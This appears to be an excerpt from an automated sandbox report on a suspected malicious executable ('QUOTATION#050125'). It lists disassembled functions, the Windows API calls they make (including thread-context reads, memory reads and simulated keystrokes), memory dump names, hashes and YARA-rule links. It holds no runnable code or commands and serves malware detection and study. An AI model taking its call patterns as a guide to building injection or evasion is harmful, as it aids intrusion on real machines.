Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01B28501
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01B28523

Memory Dump Source

Source File: 00000000.00000002.2053175010.0000000001B26000.00000040.00000020.00020000.00000000.sdmp, Offset: 01B26000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b26000_QUOTATION#050125.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 7bc2eb71131a5ca0d961fb64b4ce1da28befc4a8e94ed8bda1bc50d134690387
Instruction ID: 6320eaaf6d39f45f14e61800fba153fab6773931b9b1956cb381c2bbc325a92e
Opcode Fuzzy Hash: 7bc2eb71131a5ca0d961fb64b4ce1da28befc4a8e94ed8bda1bc50d134690387
Instruction Fuzzy Hash: 5612EE24E24658C6EB24DF64D8507DEB232EF68300F1090E9D10DEB7A5E77A4F85CB5A

Function 0050709C Relevance: 1.8, APIs: 1, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: 3e77f7e78cc24af1ba020696963545b0e0ff6d38fb1491e7938e8cfa3449dcd3
Instruction ID: 3020b5c6cbd54d43ae8d25a7d45e356e964ee7a2913913e1fef70163e1ccaba4
Opcode Fuzzy Hash: 3e77f7e78cc24af1ba020696963545b0e0ff6d38fb1491e7938e8cfa3449dcd3
Instruction Fuzzy Hash: BDD17D70E0420AEFDF14EF99C8819EDBBB5FF48314F14445AE915AB291D730AD81CB94

Function 0049FC70 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 0049FD1F

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 5e2735a6f5c93003f986e61afcc627c758d5c78f88eb2fcde718d00e373f98e2
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 8831E174A001099BDB18CF59D48096AFBA2FF49300B24C6B6E80ACB756D739EDC5CBC5

Function 00484ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00484E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00484EDD,?,00551418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00484E9C
Part of subcall function 00484E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00484EAE
Part of subcall function 00484E90: FreeLibrary.KERNEL32(00000000,?,?,00484EDD,?,00551418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00484EC0

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00551418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00484EFD

Part of subcall function 00484E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,004C3CDE,?,00551418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00484E62
Part of subcall function 00484E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00484E74
Part of subcall function 00484E59: FreeLibrary.KERNEL32(00000000,?,?,004C3CDE,?,00551418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00484E87

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: cf476a325d56fddf7e9c65dbd8f107dc4ceb4dd3ac10ba5fa89913a74b93c1e9
Instruction ID: 44800e5ba75c651107cf964937cf980b14b3e368fda88537a75ca0168d1a1b3b
Opcode Fuzzy Hash: cf476a325d56fddf7e9c65dbd8f107dc4ceb4dd3ac10ba5fa89913a74b93c1e9
Instruction Fuzzy Hash: B6113A32600306ABCF10FF66DC02FAD77A5AF90719F10882FF642A61C1EE789E059758

Function 004B3820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00551444,?,0049FDF5,?,?,0048A976,00000010,00551440,004813FC,?,004813C6,?,00481129), ref: 004B3852

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 3202a1d1aaa2dc4148f95e0fe53737908f593a4d935dcfcc7f065e793b6e7abb
Instruction ID: de3c90f9404e8b8603d8fe145ed140cafa3ee7ec3339dfee5207154ad81d280e
Opcode Fuzzy Hash: 3202a1d1aaa2dc4148f95e0fe53737908f593a4d935dcfcc7f065e793b6e7abb
Instruction Fuzzy Hash: 7EE0E53114022466D7213EBB9C00BDB3AC8AB927B2F060037BC04926D0DB59DD0181FF

Function 00484F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,00551418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00484F6D

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: aa94951e7d2409989562977598bf5aefc3abb782a7efae0a9bf89d79920f3225
Instruction ID: 0390a93a9039e3a02bdc3f44487d8e582c92d7f8ddb10ce0edd4184318ffe558
Opcode Fuzzy Hash: aa94951e7d2409989562977598bf5aefc3abb782a7efae0a9bf89d79920f3225
Instruction Fuzzy Hash: CEF08C70005302CFCB34AF20D49081ABBE0AF543193108D6FE3EA82610C7359844DB08

Function 004ECCFF Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,?,004CEE51,00543630,00000002), ref: 004ECD26

Part of subcall function 004ECC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,004ECD19,?,?,?), ref: 004ECC59
Part of subcall function 004ECC37: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,004ECD19,?,?,?,?,004CEE51,00543630,00000002), ref: 004ECC6E
Part of subcall function 004ECC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,004ECD19,?,?,?,?,004CEE51,00543630,00000002), ref: 004ECC7A

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: File$Pointer$Write
String ID:
API String ID: 3847668363-0
Opcode ID: fb1af8ce38acc0acf67be593cd281c60c42526c91a4600e6dde9c61ca335a2a7
Instruction ID: 2bd20b759b0c4240977e98ed4275278de6580ec9c84a6fb552a0cdbe1e7a84f9
Opcode Fuzzy Hash: fb1af8ce38acc0acf67be593cd281c60c42526c91a4600e6dde9c61ca335a2a7
Instruction Fuzzy Hash: 54E0397A400604EFC7219F8ADD408AABBF8FF85261710852FE99682110D3B5AA55DBA0

Function 00482DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00482DC4

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: 8cd38005b1e7f8902050c7e6bbc36be0403debde0709002a5989b879e6b09823
Instruction ID: 6f9a3b932907da6b30eee555b667f95009e5d0c4d0507cf0521b45740e7bbb1e
Opcode Fuzzy Hash: 8cd38005b1e7f8902050c7e6bbc36be0403debde0709002a5989b879e6b09823
Instruction Fuzzy Hash: 0EE0CD766002245BC710A3599C05FDA77DDDFC8794F05407AFD0AD7258D974ED848654

Function 00482B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00483837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00483908

Part of subcall function 0048D730: GetInputState.USER32 ref: 0048D807

SetCurrentDirectoryW.KERNEL32(?), ref: 00482B6B

Part of subcall function 004830F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0048314E

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: IconNotifyShell_$CurrentDirectoryInputState
String ID:
API String ID: 3667716007-0
Opcode ID: ba249012fb614433e8e8922529ea9bda4ba9a2c2fb175aed6bb35019bd9be192
Instruction ID: fc065804813d79f3ec949a36cdad6dd415daf2116adeb598b841a6359d848b51
Opcode Fuzzy Hash: ba249012fb614433e8e8922529ea9bda4ba9a2c2fb175aed6bb35019bd9be192
Instruction Fuzzy Hash: 34E0262130020402CA04BF36A8225BDAB899BE175BF002D3FF442431A2CE2C4949431A

Function 004C039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,004C0704,?,?,00000000,?,004C0704,00000000,0000000C), ref: 004C03B7

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 181203ecd9660242a4bb92ec971c61470fea0a7d4be009c3f7172f5b3d76e977
Instruction ID: 306226355cbeb5f68112e663bc90d22b1c64247ec5b4d25fa52b71a5acb3457a
Opcode Fuzzy Hash: 181203ecd9660242a4bb92ec971c61470fea0a7d4be009c3f7172f5b3d76e977
Instruction Fuzzy Hash: 3DD06C3208010DBBDF028F84DD06EDA3FAAFB48714F018000BE1856020C732E821EB90

Function 00481CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00481CBC

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: 4b8e31755c663f388247153a170123f2e78eadb99f7e4c55216986f5fc6d6b10
Instruction ID: 6480a4280edffb4147d4d7a4904f49f6d20d1bcf03450ca05d9f8a05ec343ede
Opcode Fuzzy Hash: 4b8e31755c663f388247153a170123f2e78eadb99f7e4c55216986f5fc6d6b10
Instruction Fuzzy Hash: 1EC092362C0304AFF2158B80BC6AF507B65A368B02F068801F609A95F3D3A22828FB54

Function 004F744A Relevance: 1.5, APIs: 1, Instructions: 220COMMON

Download Yara Rule

APIs

Part of subcall function 00485745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0048949C,?,00008000), ref: 00485773

GetLastError.KERNEL32(00000002,00000000), ref: 004F76DE

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: CreateErrorFileLast
String ID:
API String ID: 1214770103-0
Opcode ID: 95e1c27e1ed5a101a69b58cfafdd0e1d41e02472861eb870eceb3a8614781f1d
Instruction ID: c47984501454e89897a4c9ddb9a20bf50589e0aa174abdcc5cacdc6bee8f7bb6
Opcode Fuzzy Hash: 95e1c27e1ed5a101a69b58cfafdd0e1d41e02472861eb870eceb3a8614781f1d
Instruction Fuzzy Hash: 1181C0302087059FDB04FF29C491A6EB7E1BF48358F04495EF9869B392DB38AD45CB5A

Function 00486246 Relevance: 1.3, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,00000000,004C24E0), ref: 00486266

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 7708cac2056bd3f34a22ff85d226658f551ce7f69de15b5d8c09a93b60584e4c
Instruction ID: 38ebf8fe8499d7857050581e4e1cd38b6a976f63a263e765215341a77b328391
Opcode Fuzzy Hash: 7708cac2056bd3f34a22ff85d226658f551ce7f69de15b5d8c09a93b60584e4c
Instruction Fuzzy Hash: F2E09275400B11CEC3B16F1AE808456FBE6FEE13613218EAFD0E592660D3B4588A9B54

Function 01B28CB0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 01B28CC1

Memory Dump Source

Source File: 00000000.00000002.2053175010.0000000001B26000.00000040.00000020.00020000.00000000.sdmp, Offset: 01B26000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b26000_QUOTATION#050125.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 8a72b32e8e5a5fca729c8a7fab1a6b874eab58e7a1d2f29c712b36751aca78c7
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 97E0E67494110DDFDB00EFB4D64969E7FF4EF04301F1001A1FD05D2281D7319D508A62

Non-executed Functions

Function 00519576 Relevance: 74.1, APIs: 39, Strings: 3, Instructions: 625windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00499BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00499BB2

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0051961A
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0051965B
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0051969F
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 005196C9
SendMessageW.USER32 ref: 005196F2
GetKeyState.USER32(00000011), ref: 0051978B
GetKeyState.USER32(00000009), ref: 00519798
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 005197AE
GetKeyState.USER32(00000010), ref: 005197B8
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 005197E9
SendMessageW.USER32 ref: 00519810
SendMessageW.USER32(?,00001030,?,00517E95), ref: 00519918
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0051992E
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00519941
SetCapture.USER32(?), ref: 0051994A
ClientToScreen.USER32(?,?), ref: 005199AF
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 005199BC
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 005199D6
ReleaseCapture.USER32 ref: 005199E1
GetCursorPos.USER32(?), ref: 00519A19
ScreenToClient.USER32(?,?), ref: 00519A26
SendMessageW.USER32(?,00001012,00000000,?), ref: 00519A80
SendMessageW.USER32 ref: 00519AAE
SendMessageW.USER32(?,00001111,00000000,?), ref: 00519AEB
SendMessageW.USER32 ref: 00519B1A
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00519B3B
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00519B4A
GetCursorPos.USER32(?), ref: 00519B68
ScreenToClient.USER32(?,?), ref: 00519B75
GetParent.USER32(?), ref: 00519B93
SendMessageW.USER32(?,00001012,00000000,?), ref: 00519BFA
SendMessageW.USER32 ref: 00519C2B
ClientToScreen.USER32(?,?), ref: 00519C84
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00519CB4
SendMessageW.USER32(?,00001111,00000000,?), ref: 00519CDE
SendMessageW.USER32 ref: 00519D01
ClientToScreen.USER32(?,?), ref: 00519D4E
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00519D82

Part of subcall function 00499944: GetWindowLongW.USER32(?,000000EB), ref: 00499952

GetWindowLongW.USER32(?,000000F0), ref: 00519E05

Strings

@GUI_DRAGID, xrefs: 0051997D
p#U, xrefs: 00519990
F, xrefs: 00519D07

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
String ID: @GUI_DRAGID$F$p#U
API String ID: 3429851547-4027064566
Opcode ID: ce5fcb95df6f5e01e3cd6f9f80a822db154acf709a6cd7bfcba441996208f3e4
Instruction ID: 894a41d4677e5c783cf01c3db6336314f3b77ebca24cb5f49bf5744da57107d2
Opcode Fuzzy Hash: ce5fcb95df6f5e01e3cd6f9f80a822db154acf709a6cd7bfcba441996208f3e4
Instruction Fuzzy Hash: 53428E74204201EFEB24CF28CC64AEABFE5FF99314F144A1DF5958B2A1D731A894DB51

Function 00514873 Relevance: 56.6, APIs: 31, Strings: 1, Instructions: 566windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 005148F3
SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00514908
SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00514927
SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0051494B
SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0051495C
SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0051497B
SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 005149AE
SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 005149D4
SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00514A0F
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00514A56
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00514A7E
IsMenu.USER32(?), ref: 00514A97
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00514AF2
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00514B20
GetWindowLongW.USER32(?,000000F0), ref: 00514B94
SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00514BE3
SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00514C82
wsprintfW.USER32 ref: 00514CAE
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00514CC9
GetWindowTextW.USER32(?,00000000,00000001), ref: 00514CF1
SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00514D13
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00514D33
GetWindowTextW.USER32(?,00000000,00000001), ref: 00514D5A

Strings

%d/%02d/%02d, xrefs: 00514CA8

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
String ID: %d/%02d/%02d
API String ID: 4054740463-328681919
Opcode ID: 96e8ab989b474ebb2bad374e65bbead3d9df13448004f6e1f60234c828beab8c
Instruction ID: 3a25721dea8c2312a6e2b470866116b76bb7549f88192361d17b00825d261ad5
Opcode Fuzzy Hash: 96e8ab989b474ebb2bad374e65bbead3d9df13448004f6e1f60234c828beab8c
Instruction Fuzzy Hash: 0F12FC71600214ABFB249F28CC49FEE7FB8BF45314F10552AF916EA2A1DB789985CF50

Function 0049F98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0049F998
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004DF474
IsIconic.USER32(00000000), ref: 004DF47D
ShowWindow.USER32(00000000,00000009), ref: 004DF48A
SetForegroundWindow.USER32(00000000), ref: 004DF494
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004DF4AA
GetCurrentThreadId.KERNEL32 ref: 004DF4B1
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004DF4BD
AttachThreadInput.USER32(?,00000000,00000001), ref: 004DF4CE
AttachThreadInput.USER32(?,00000000,00000001), ref: 004DF4D6
AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 004DF4DE
SetForegroundWindow.USER32(00000000), ref: 004DF4E1
MapVirtualKeyW.USER32(00000012,00000000), ref: 004DF4F6
keybd_event.USER32(00000012,00000000), ref: 004DF501
MapVirtualKeyW.USER32(00000012,00000000), ref: 004DF50B
keybd_event.USER32(00000012,00000000), ref: 004DF510
MapVirtualKeyW.USER32(00000012,00000000), ref: 004DF519
keybd_event.USER32(00000012,00000000), ref: 004DF51E
MapVirtualKeyW.USER32(00000012,00000000), ref: 004DF528
keybd_event.USER32(00000012,00000000), ref: 004DF52D
SetForegroundWindow.USER32(00000000), ref: 004DF530
